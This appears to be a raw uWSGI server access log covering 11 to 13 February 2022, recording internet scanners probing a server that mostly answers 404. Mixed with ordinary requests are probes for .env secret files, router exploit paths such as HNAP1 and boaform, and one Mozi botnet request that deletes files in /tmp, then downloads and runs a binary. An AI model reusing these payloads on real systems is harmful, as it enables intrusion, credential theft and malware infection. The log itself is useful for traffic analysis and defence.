Feb 11 17:03:56 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 927/1086] 39.99.229.34 () {36 vars in 462 bytes} [Fri Feb 11 17:04:17 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 928/1087] 39.99.229.34 () {34 vars in 413 bytes} [Fri Feb 11 17:04:17 2022] GET /favicon.ico => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 929/1088] 183.136.225.56 () {34 vars in 535 bytes} [Fri Feb 11 17:07:03 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 930/1089] 116.233.200.101 () {26 vars in 299 bytes} [Fri Feb 11 17:28:11 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 931/1090] 116.233.200.101 () {30 vars in 341 bytes} [Fri Feb 11 17:28:17 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 932/1091] 116.233.200.101 () {42 vars in 799 bytes} [Fri Feb 11 17:28:18 2022] POST /cgi-bin/luci/;stok=/locale?form=lang => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 933/1092] 116.233.200.101 () {30 vars in 341 bytes} [Fri Feb 11 17:28:18 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 934/1093] 116.233.200.101 () {30 vars in 371 bytes} [Fri Feb 11 17:28:20 2022] GET /navigation.html => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19145|app: 0|req: 12/1095] 116.233.200.101 () {30 vars in 341 bytes} [Fri Feb 11 17:28:20 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 935/1095] 116.233.200.101 () {30 vars in 341 bytes} [Fri Feb 11 17:28:20 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19144|app: 0|req: 12/1096] 116.233.200.101 () {30 vars in 424 bytes} [Fri Feb 11 17:28:20 2022] GET /fx_plcinf.html?CMD=Monitor%20Start&LANG=EN => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19141|app: 0|req: 4/1097] 116.233.200.101 () {30 vars in 341 bytes} [Fri Feb 11 17:28:20 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 936/1098] 116.233.200.101 () {30 vars in 367 bytes} [Fri Feb 11 17:28:20 2022] GET /ifixwebspace/ => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 937/1099] 116.233.200.101 () {30 vars in 365 bytes} [Fri Feb 11 17:28:20 2022] GET /KingViewWeb/ => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 938/1100] 116.233.200.101 () {30 vars in 367 bytes} [Fri Feb 11 17:28:20 2022] GET /webconfig.ini => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 939/1101] 83.97.20.34 () {30 vars in 329 bytes} [Fri Feb 11 17:30:58 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 940/1102] 170.254.73.151 () {32 vars in 463 bytes} [Fri Feb 11 18:20:14 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 941/1103] 209.17.96.154 () {30 vars in 410 bytes} [Fri Feb 11 18:25:50 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 942/1104] 83.97.20.34 () {26 vars in 287 bytes} [Fri Feb 11 19:16:36 2022] GET / => generated 179 bytes in 2 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 943/1105] 106.75.85.103 () {38 vars in 617 bytes} [Fri Feb 11 20:17:43 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 944/1106] 185.216.215.107 () {40 vars in 569 bytes} [Fri Feb 11 20:45:36 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 945/1107] 40.71.60.51 () {36 vars in 521 bytes} [Fri Feb 11 21:02:58 2022] GET /.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 946/1108] 40.71.60.51 () {40 vars in 628 bytes} [Fri Feb 11 21:02:59 2022] POST / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 947/1109] 62.171.150.168 () {28 vars in 311 bytes} [Fri Feb 11 21:16:47 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 948/1110] 62.171.150.168 () {40 vars in 678 bytes} [Fri Feb 11 21:16:49 2022] POST /HNAP1/ => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 949/1111] 185.216.215.107 () {40 vars in 569 bytes} [Fri Feb 11 22:19:30 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 950/1112] 121.138.118.226 () {32 vars in 466 bytes} [Fri Feb 11 23:46:27 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 951/1113] 83.97.20.34 () {30 vars in 329 bytes} [Fri Feb 11 23:59:38 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 952/1114] 23.95.100.141 () {48 vars in 869 bytes} [Sat Feb 12 00:32:28 2022] POST /boaform/admin/formLogin => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 953/1115] 47.101.198.81 () {34 vars in 459 bytes} [Sat Feb 12 00:56:09 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 954/1116] 83.97.20.34 () {26 vars in 287 bytes} [Sat Feb 12 01:19:58 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 955/1117] 109.248.128.75 () {36 vars in 491 bytes} [Sat Feb 12 01:50:49 2022] GET /logs => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 956/1118] 114.134.11.31 () {28 vars in 307 bytes} [Sat Feb 12 02:01:36 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 957/1119] 46.249.33.15 () {42 vars in 676 bytes} [Sat Feb 12 02:11:47 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[uwsgi-http key: client_addr: 104.152.52.106 client_port: 1247] hr_read(): Connection reset by peer [plugins/http/http.c line 918] +[pid: 19148|app: 0|req: 958/1120] 193.118.53.194 () {34 vars in 488 bytes} [Sat Feb 12 03:39:17 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[uwsgi-http key: client_addr: 31.44.185.123 client_port: 7419] hr_read(): Connection reset by peer [plugins/http/http.c line 918] +[pid: 19148|app: 0|req: 959/1121] 13.212.184.170 () {36 vars in 441 bytes} [Sat Feb 12 05:07:20 2022] GET /.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 960/1122] 13.212.184.170 () {36 vars in 453 bytes} [Sat Feb 12 05:07:21 2022] GET /admin/.env => generated 0 bytes in 2 msecs (HTTP/1.1 302) 9 headers in 335 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 961/1123] 13.212.184.170 () {36 vars in 461 bytes} [Sat Feb 12 05:07:21 2022] GET /admin-app/.env => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 962/1124] 13.212.184.170 () {36 vars in 449 bytes} [Sat Feb 12 05:07:21 2022] GET /api/.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 963/1125] 13.212.184.170 () {36 vars in 451 bytes} [Sat Feb 12 05:07:21 2022] GET /back/.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 964/1126] 13.212.184.170 () {36 vars in 457 bytes} [Sat Feb 12 05:07:22 2022] GET /backend/.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 965/1127] 13.212.184.170 () {36 vars in 447 bytes} [Sat Feb 12 05:07:22 2022] GET /cp/.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 966/1128] 13.212.184.170 () {36 vars in 465 bytes} [Sat Feb 12 05:07:22 2022] GET /development/.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 967/1129] 13.212.184.170 () {36 vars in 455 bytes} [Sat Feb 12 05:07:22 2022] GET /docker/.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 968/1130] 13.212.184.170 () {36 vars in 453 bytes} [Sat Feb 12 05:07:23 2022] GET /local/.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 969/1131] 13.212.184.170 () {36 vars in 457 bytes} [Sat Feb 12 05:07:23 2022] GET /private/.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 970/1132] 13.212.184.170 () {36 vars in 451 bytes} [Sat Feb 12 05:07:23 2022] GET /rest/.env => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 971/1133] 13.212.184.170 () {36 vars in 455 bytes} [Sat Feb 12 05:07:23 2022] GET /shared/.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 972/1134] 13.212.184.170 () {36 vars in 457 bytes} [Sat Feb 12 05:07:23 2022] GET /laravel/.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 973/1135] 13.212.184.170 () {36 vars in 455 bytes} [Sat Feb 12 05:07:24 2022] GET /system/.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 974/1136] 13.212.184.170 () {36 vars in 457 bytes} [Sat Feb 12 05:07:24 2022] GET /sources/.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 975/1137] 13.212.184.170 () {36 vars in 455 bytes} [Sat Feb 12 05:07:24 2022] GET /public/.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 976/1138] 13.212.184.170 () {36 vars in 447 bytes} [Sat Feb 12 05:07:24 2022] GET /v1/.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 977/1139] 13.212.184.170 () {36 vars in 449 bytes} [Sat Feb 12 05:07:25 2022] GET /app/.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 978/1140] 13.212.184.170 () {36 vars in 455 bytes} [Sat Feb 12 05:07:25 2022] GET /config/.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 979/1141] 13.212.184.170 () {36 vars in 451 bytes} [Sat Feb 12 05:07:25 2022] GET /core/.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 980/1142] 13.212.184.170 () {36 vars in 451 bytes} [Sat Feb 12 05:07:25 2022] GET /apps/.env => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 981/1143] 13.212.184.170 () {36 vars in 449 bytes} [Sat Feb 12 05:07:26 2022] GET /lib/.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 982/1144] 13.212.184.170 () {36 vars in 451 bytes} [Sat Feb 12 05:07:26 2022] GET /cron/.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 983/1145] 13.212.184.170 () {36 vars in 459 bytes} [Sat Feb 12 05:07:26 2022] GET /database/.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 984/1146] 13.212.184.170 () {36 vars in 457 bytes} [Sat Feb 12 05:07:26 2022] GET /uploads/.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 985/1147] 13.212.184.170 () {36 vars in 451 bytes} [Sat Feb 12 05:07:27 2022] GET /site/.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 986/1148] 13.212.184.170 () {36 vars in 449 bytes} [Sat Feb 12 05:07:27 2022] GET /web/.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19146|app: 0|req: 37/1149] 13.212.184.170 () {36 vars in 469 bytes} [Sat Feb 12 05:07:27 2022] GET /administrator/.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 987/1150] 116.16.152.247 () {34 vars in 643 bytes} [Sat Feb 12 05:28:47 2022] GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 988/1151] 185.216.215.107 () {40 vars in 569 bytes} [Sat Feb 12 05:56:48 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 989/1152] 132.145.39.16 () {34 vars in 438 bytes} [Sat Feb 12 06:52:19 2022] GET /contact => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 990/1153] 83.97.20.34 () {26 vars in 287 bytes} [Sat Feb 12 07:07:54 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 991/1154] 1.12.217.218 () {44 vars in 748 bytes} [Sat Feb 12 07:58:20 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 992/1155] 38.146.84.247 () {32 vars in 464 bytes} [Sat Feb 12 09:04:22 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 993/1156] 109.237.103.123 () {36 vars in 525 bytes} [Sat Feb 12 09:05:13 2022] GET /.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 994/1157] 167.248.133.117 () {28 vars in 312 bytes} [Sat Feb 12 10:16:17 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 995/1158] 167.248.133.117 () {34 vars in 444 bytes} [Sat Feb 12 10:16:18 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 996/1159] 109.237.103.38 () {36 vars in 524 bytes} [Sat Feb 12 10:33:18 2022] GET /.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19147|app: 0|req: 81/1160] 183.136.225.56 () {34 vars in 456 bytes} [Sat Feb 12 11:07:44 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 997/1161] 216.218.206.66 () {28 vars in 308 bytes} [Sat Feb 12 11:45:29 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 998/1162] 83.97.20.34 () {30 vars in 328 bytes} [Sat Feb 12 11:47:03 2022] GET / => generated 179 bytes in 2 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 999/1163] 104.131.59.242 () {32 vars in 440 bytes} [Sat Feb 12 11:48:34 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1000/1164] 35.195.93.98 () {42 vars in 562 bytes} [Sat Feb 12 12:26:12 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1001/1165] 109.237.103.9 () {36 vars in 523 bytes} [Sat Feb 12 12:43:30 2022] GET /.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1002/1166] 83.97.20.34 () {26 vars in 287 bytes} [Sat Feb 12 13:17:56 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1003/1167] 109.237.103.118 () {36 vars in 525 bytes} [Sat Feb 12 13:26:28 2022] GET /.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1004/1168] 95.29.80.204 () {32 vars in 469 bytes} [Sat Feb 12 14:32:17 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1005/1169] 128.14.141.34 () {34 vars in 564 bytes} [Sat Feb 12 14:56:13 2022] GET /Telerik.Web.UI.WebResource.axd?type=rau => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1006/1170] 192.241.208.81 () {34 vars in 394 bytes} [Sat Feb 12 15:18:19 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1007/1171] 101.132.125.197 () {34 vars in 431 bytes} [Sat Feb 12 15:36:59 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1008/1172] 154.209.125.38 () {34 vars in 459 bytes} [Sat Feb 12 16:10:01 2022] GET / => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1009/1173] 67.245.195.96 () {28 vars in 307 bytes} [Sat Feb 12 16:54:50 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1010/1174] 45.143.144.187 () {36 vars in 524 bytes} [Sat Feb 12 17:00:11 2022] GET /.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1011/1175] 45.143.144.187 () {40 vars in 631 bytes} [Sat Feb 12 17:00:11 2022] POST / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1012/1176] 185.163.109.66 () {34 vars in 537 bytes} [Sat Feb 12 17:46:06 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1013/1177] 185.163.109.66 () {30 vars in 360 bytes} [Sat Feb 12 17:46:07 2022] GET /robots.txt => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1014/1178] 185.163.109.66 () {30 vars in 362 bytes} [Sat Feb 12 17:46:08 2022] GET /sitemap.xml => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1015/1179] 185.163.109.66 () {30 vars in 388 bytes} [Sat Feb 12 17:46:08 2022] GET /.well-known/security.txt => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1016/1180] 185.163.109.66 () {36 vars in 515 bytes} [Sat Feb 12 17:46:13 2022] GET /favicon.ico => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1017/1181] 62.171.150.168 () {28 vars in 311 bytes} [Sat Feb 12 18:42:22 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1018/1182] 62.171.150.168 () {40 vars in 678 bytes} [Sat Feb 12 18:42:23 2022] POST /HNAP1/ => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1019/1183] 83.97.20.34 () {26 vars in 286 bytes} [Sat Feb 12 19:03:45 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1020/1184] 132.145.39.16 () {36 vars in 523 bytes} [Sat Feb 12 19:50:14 2022] GET /.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1021/1185] 132.145.39.16 () {40 vars in 630 bytes} [Sat Feb 12 19:50:14 2022] POST / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1022/1186] 20.125.192.78 () {36 vars in 523 bytes} [Sat Feb 12 20:25:37 2022] GET /.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1023/1187] 20.125.192.78 () {40 vars in 630 bytes} [Sat Feb 12 20:25:38 2022] POST / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1024/1188] 39.98.247.172 () {34 vars in 459 bytes} [Sat Feb 12 20:49:46 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1025/1189] 185.180.143.79 () {34 vars in 488 bytes} [Sat Feb 12 20:58:23 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1026/1190] 185.180.143.79 () {34 vars in 512 bytes} [Sat Feb 12 20:58:24 2022] GET /showLogin.cc => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1027/1191] 85.202.169.88 () {40 vars in 567 bytes} [Sat Feb 12 21:15:28 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1028/1192] 209.17.97.90 () {30 vars in 409 bytes} [Sat Feb 12 22:41:15 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1029/1193] 83.97.20.34 () {30 vars in 329 bytes} [Sat Feb 12 22:48:55 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1030/1194] 192.241.212.219 () {34 vars in 419 bytes} [Sun Feb 13 00:12:23 2022] GET /ReportServer => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1031/1195] 128.1.248.42 () {34 vars in 486 bytes} [Sun Feb 13 00:15:14 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1032/1196] 223.94.89.20 () {30 vars in 435 bytes} [Sun Feb 13 00:30:29 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1033/1197] 156.96.154.71 () {36 vars in 523 bytes} [Sun Feb 13 00:30:49 2022] GET /.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1034/1198] 156.96.154.71 () {40 vars in 630 bytes} [Sun Feb 13 00:30:51 2022] POST / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1035/1199] 156.96.154.71 () {36 vars in 523 bytes} [Sun Feb 13 00:31:38 2022] GET /.env => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1036/1200] 156.96.154.71 () {40 vars in 630 bytes} [Sun Feb 13 00:31:40 2022] POST / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1037/1201] 157.56.165.117 () {36 vars in 524 bytes} [Sun Feb 13 00:49:30 2022] GET /.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1038/1202] 157.56.165.117 () {40 vars in 631 bytes} [Sun Feb 13 00:49:30 2022] POST / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1039/1203] 83.97.20.34 () {26 vars in 287 bytes} [Sun Feb 13 01:00:26 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1040/1204] 157.56.165.117 () {36 vars in 524 bytes} [Sun Feb 13 01:02:52 2022] GET /.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1041/1205] 157.56.165.117 () {40 vars in 631 bytes} [Sun Feb 13 01:02:52 2022] POST / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1042/1206] 183.136.225.56 () {34 vars in 535 bytes} [Sun Feb 13 02:34:36 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1043/1207] 47.101.154.181 () {34 vars in 430 bytes} [Sun Feb 13 02:36:08 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1044/1208] 47.102.102.235 () {34 vars in 432 bytes} [Sun Feb 13 02:37:36 2022] GET / => generated 179 bytes in 1 msecs 